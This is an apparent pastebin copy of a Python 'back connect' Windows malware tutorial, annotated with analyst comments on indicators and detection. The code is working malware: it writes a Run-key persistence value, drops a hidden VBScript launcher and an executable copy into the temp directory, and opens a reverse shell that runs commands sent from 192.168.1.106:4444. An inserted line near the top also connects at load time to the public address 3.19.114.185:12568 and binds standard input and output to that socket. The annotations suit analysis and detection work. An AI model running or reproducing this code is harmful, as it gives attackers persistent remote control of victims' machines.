
Untitled

a guest
Oct 15th, 2019
  1. # HACKING WITH PYTHON
  2. # Simple malware for back connect in python for windows ;)
  3.  
  4. # Autor: anarc0der
  5.  
  6. import os
  7. import subprocess
  8. import socket
  9. import sys
  10. import tempfile
  11. from _winreg import *
  12.  
  # Analyst note: the constants below are this sample's host and network
  # indicators: the dropped file names, the Run-key value name and the
  # hard-coded callback endpoint used by reverse_shell_function().
  13. MALWARE_NAME = "malware.exe"
  14. TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"
  # Run-key path: values stored under this key are started at logon, which is
  # the persistence mechanism infect_windows_register_keys() relies on.
  15. KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"
  16. KEY_NAME = "anarc0der_key"
  17. REV_SHELL = "192.168.1.106"
  18. SHELL_PORT = 4444
  # Both dropped files are placed in the directory returned by
  # tempfile.gettempdir(); a script plus an executable appearing there together
  # is a useful host-side hunting pivot.
  19. TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER
  20. MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME
  # NOTE(review): the next statement runs at module load, before the class or
  # main() are reached. It connects to a second hard-coded endpoint that is not
  # REV_SHELL/SHELL_PORT and redirects file descriptors 0 and 1 to that socket.
  # It looks like an addition to the original tutorial script (unverified), so
  # anyone who executes this paste as-is contacts that host regardless of the
  # constants above. Treat both endpoints as network indicators.
  21. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.19.114.185",12568));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
  22. print "[+] Loading Script, please wait..."
  23.  
  # Analyst summary of the class: three methods covering persistence (Run-key
  # value), file drop (VBScript launcher plus a copy of the executable) and a
  # plain-TCP remote command loop. The paste has lost its indentation; the
  # statements below are kept exactly as published.
  24. class My_malware():
  25.  
  # Persistence step. Enumerates the value names under HKLM\...\Run and, when
  # KEY_NAME is absent, reopens the key with KEY_ALL_ACCESS and stores a REG_SZ
  # value named KEY_NAME whose data is TRIGGER_PATH.
  # Returns False when the value had to be created, True when it already existed.
  # Mitigation: writing to HKLM typically requires administrative rights, so
  # least-privilege accounts block this write.
  # Detection: creation of a Run-key value whose data points at a .vbs file in a
  # temp directory (registry auditing / EDR registry-set events).
  26. def infect_windows_register_keys(self):
  27. """ Method to register malware on windows keys.
  28. Returns False if didnt have key for malware.
  29. Returns True if already have key for malware. """
  30. key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
  31. keys = []
  32. try:
  33. i=0
  34. while True:
  35. cur_key = EnumValue(key, i)
  36. keys.append(cur_key[0])
  37. i+=1
  # The bare except is what ends the enumeration loop: EnumValue raises once the
  # index runs past the last value. It also swallows every other error.
  38. except:
  39. pass
  40. if KEY_NAME not in keys:
  41. mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
  42. SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
  43. mlwr_key.Close()
  44. return False
  45. return True
  46.  
  # File-drop step. When either file is missing it writes a two-line VBScript to
  # TRIGGER_PATH and copies MALWARE_NAME to MALWARE_PATH with the shell's copy
  # command. The script calls WScript.Shell Run on MALWARE_PATH with window
  # style 0 (hidden window) and without waiting for it to finish.
  # Returns True when both files already existed, False after dropping them.
  # Detection: a .vbs and an .exe with the same base name written to the temp
  # directory, and later a script host process starting an executable from there.
  47. def hide_malware_and_trigger(self):
  48. """ Method to generate & hide the trigger and malware.
  49. Return True if was alredy hided.
  50. Return False if wasnt hided """
  51. if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
  52. return True
  53. else:
  54. payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
  55. with open(TRIGGER_PATH, 'w') as f:
  56. f.write(payload)
  57. os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))
  58. return False
  59.  
  # Remote command loop. Opens an outbound TCP connection to REV_SHELL:SHELL_PORT,
  # sends a banner, then repeatedly reads up to 1024 bytes and hands them
  # unmodified to subprocess.Popen(shell=True), returning stdout and stderr over
  # the same socket. The loop ends when the received data contains "quit".
  # Detection: the traffic is unencrypted, so the banner text and the "Comando: "
  # prompt are visible to network inspection; on the host, look for this process
  # spawning command-interpreter children while holding an outbound connection.
  60. def reverse_shell_function(self):
  61. """ Method of reverse shell in python """
  62. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63. s.connect((REV_SHELL,SHELL_PORT))
  64. s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
  65. while True:
  66. data = s.recv(1024)
  67. if "quit" in data:
  68. break
  69. cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  # saida_cmd is Portuguese for "command output": stdout followed by stderr.
  70. saida_cmd = cmd.stdout.read() + cmd.stderr.read()
  71. s.send(saida_cmd)
  72. s.send("Comando: ")
  73. s.close()
  74.  
  # Entry routine. Runs the persistence step and the file-drop step and records
  # both return values. The remote command loop is only entered when both
  # returned True, i.e. when the Run-key value and both dropped files were
  # already present. A run that has to create either of them leaves only the
  # registry and file artifacts from this code path; the module-level connect
  # near the top of the file happens regardless.
  75. def main():
  76. my_returns = []
  77. x = My_malware()
  78. my_returns.append(x.infect_windows_register_keys())
  79. my_returns.append(x.hide_malware_and_trigger())
  80. if all(res is True for res in my_returns):
  81. x.reverse_shell_function()
  82.  
  # Script entry guard: main() runs only when the file is executed directly.
  # The module-level statements above it still run on import.
  83. if __name__ == '__main__':
  84. main()